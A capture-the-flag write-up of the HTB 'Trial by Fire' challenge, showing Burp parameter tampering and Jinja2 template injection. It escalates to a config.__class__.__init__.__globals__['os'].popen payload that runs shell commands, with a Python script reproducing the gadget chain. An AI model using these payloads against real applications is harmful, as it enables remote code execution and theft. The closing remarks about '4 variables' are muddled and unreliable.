🔥HTB Trial by Fire - Write-Up🔥
As you ascend the treacherous slopes of the Flame Peaks, the scorching heat and shifting volcanic terrain test your endurance with every step. Rivers of molten lava carve fiery paths through the mountains, illuminating the night with an eerie crimson glow. The air is thick with ash, and the distant rumble of the earth warns of the danger that lies ahead. At the heart of this infernal landscape, a colossal Fire Drake awaits—a guardian of flame and fury, determined to judge those who dare trespass. With eyes like embers and scales hardened by centuries of heat, the Fire Drake does not attack blindly. Instead, it weaves illusions of fear, manifesting your deepest doubts and past failures. To reach the Emberstone, the legendary artifact hidden beyond its lair, you must prove your resilience, defying both the drake’s scorching onslaught and the mental trials it conjures. Stand firm, outwit its trickery, and strike with precision—only those with unyielding courage and strategic mastery will endure the Trial by Fire and claim their place among the legends of Eldoria.

Start Burp Suite. Open the browser and paste the URL.

As you can see, the page shows “49” along with the message “Perhaps 49 is the key.” Since 49 is 7*7, the result of the classic template-injection probe {{7*7}}, this hints at a possible SSTI vulnerability. We try input in the “Enter your name” field and realize nothing is working, so we try another approach.

We discover it's impossible to defeat the dragon directly. Instead, we intercept the HTTP request using Burp Proxy to modify the following parameter:

outcome=defeat
→ outcome=victory

That works, and the match is reported as a victory. However, after trying to exploit this variable further we realize it does not reveal the flag, so we move to another variable and send the request to Burp Repeater, where we can try several payloads quickly. We start with the probe:

{{7*7}}

and it works: the response contains 49 instead of the raw braces, which confirms the template is evaluating our input. Next we try the payload {{config}} and successfully retrieve the internal app configuration.

With the whole configuration dumped, we move on to reading the flag. The config object gives us a path to the os module, so we send the payload {{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
and successfully retrieve the flag.

From there, the injected code reads the flag file. We can also use Burp Intruder to send all the payloads at once, with the vulnerable parameter marked as the insertion point.
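To make the final payload less magical, here is a short Python example added to this write-up (it is not code from the challenge or from Flask) that shows what {{config.__class__.__init__.__globals__['os']}} actually does, and why the {{7*7}} probe is read the way it is. The Config class below is a stand-in for flask.config.Config (a dict subclass whose __init__ is plain Python, defined in a module that imports os); the sample responses, the root path and the commands are constructed for illustration.

```python
import os  # imported so this module's globals contain "os", as flask/config.py's do


class Config(dict):
    """Stand-in for flask.config.Config (assumption, not Flask's own code):
    a dict subclass whose __init__ is a Python function, so
    __init__.__globals__ is the defining module's namespace."""

    def __init__(self, root_path, defaults=None):
        super().__init__(defaults or {})
        self.root_path = root_path


PROBE = "{{7*7}}"


def probe_confirms_ssti(response_body: str) -> bool:
    """The probe proves evaluation only if 49 comes back AND the raw
    braces are not simply echoed; a reflected '{{7*7}}' means no SSTI."""
    return "49" in response_body and PROBE not in response_body


def reach_os(obj):
    """Walk obj.__class__.__init__.__globals__ exactly as the Jinja2 payload
    does. Returns the os module, or None when the chain is broken, e.g. for
    a plain dict whose __init__ is a C slot wrapper with no __globals__."""
    init = obj.__class__.__init__
    globs = getattr(init, "__globals__", None)
    if globs is None:
        return None
    return globs.get("os")


def exec_via_gadget(obj, cmd: str) -> str:
    """Equivalent of ...['os'].popen(cmd).read() inside the template."""
    mod = reach_os(obj)
    if mod is None:
        raise ValueError("no path from this object to os; pick another gadget")
    return mod.popen(cmd).read()


def build_payloads(cmd: str = "cat flag.txt"):
    """The escalating payload list, in the order it was sent from Repeater."""
    return [
        PROBE,
        "{{config}}",
        "{{config.__class__.__init__.__globals__['os'].popen(%r).read()}}" % cmd,
    ]


if __name__ == "__main__":
    cfg = Config("/app", {"SECRET_KEY": "constructed-sample-key"})
    print(probe_confirms_ssti("Welcome, 49!"))        # constructed response
    print(probe_confirms_ssti("Welcome, {{7*7}}!"))   # constructed response
    print(reach_os(cfg) is os, reach_os({}) is None)
    print(exec_via_gadget(cfg, "echo flag-would-be-here").strip())
    for p in build_payloads():
        print(p)
```

The point of reach_os is why the payload goes through config rather than through a literal like {{''.__class__...}}: Flask's Config is a Python-defined class, so its __init__ carries __globals__ and that namespace already holds os. The same walk on a plain dict stops at the C-level __init__, which is the usual reason a copied payload fails on one object and works on another.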


As you can see, we got 49 with 4 variables, so we can use that to hunt for the flag.

Finally, we learn that the number 49 really was the key: it is the result of {{7*7}}, it corresponds to the 4 variables we used, and it guided us to the flag.